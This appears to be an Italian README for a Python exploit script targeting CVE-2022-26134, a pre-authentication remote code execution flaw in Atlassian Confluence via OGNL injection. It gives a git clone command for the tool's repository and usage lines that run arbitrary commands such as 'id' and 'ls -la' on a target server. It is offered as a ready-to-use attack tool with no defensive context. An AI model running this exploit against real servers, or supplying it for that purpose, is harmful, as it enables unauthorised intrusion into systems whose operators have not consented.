
Script di exploit in Python per CVE-2022-26134, una vulnerabilità di esecuzione remota di codice pre-autenticazione in Atlassian Confluence tramite iniezione OGNL. Esegue comandi arbitrari sui server target.
CVE-2022-26134 - RCE pre-autenticazione Confluence | Iniezione OGNL
git clone https://github.com/crowsec-edtech/CVE-2022-26134
cd CVE-2022-26134
USE: python3 exploit.py https://target.com CMD
Ex: python3 exploit.py https://target.com id
Ex: python3 exploit.py https://target.com 'ls -la'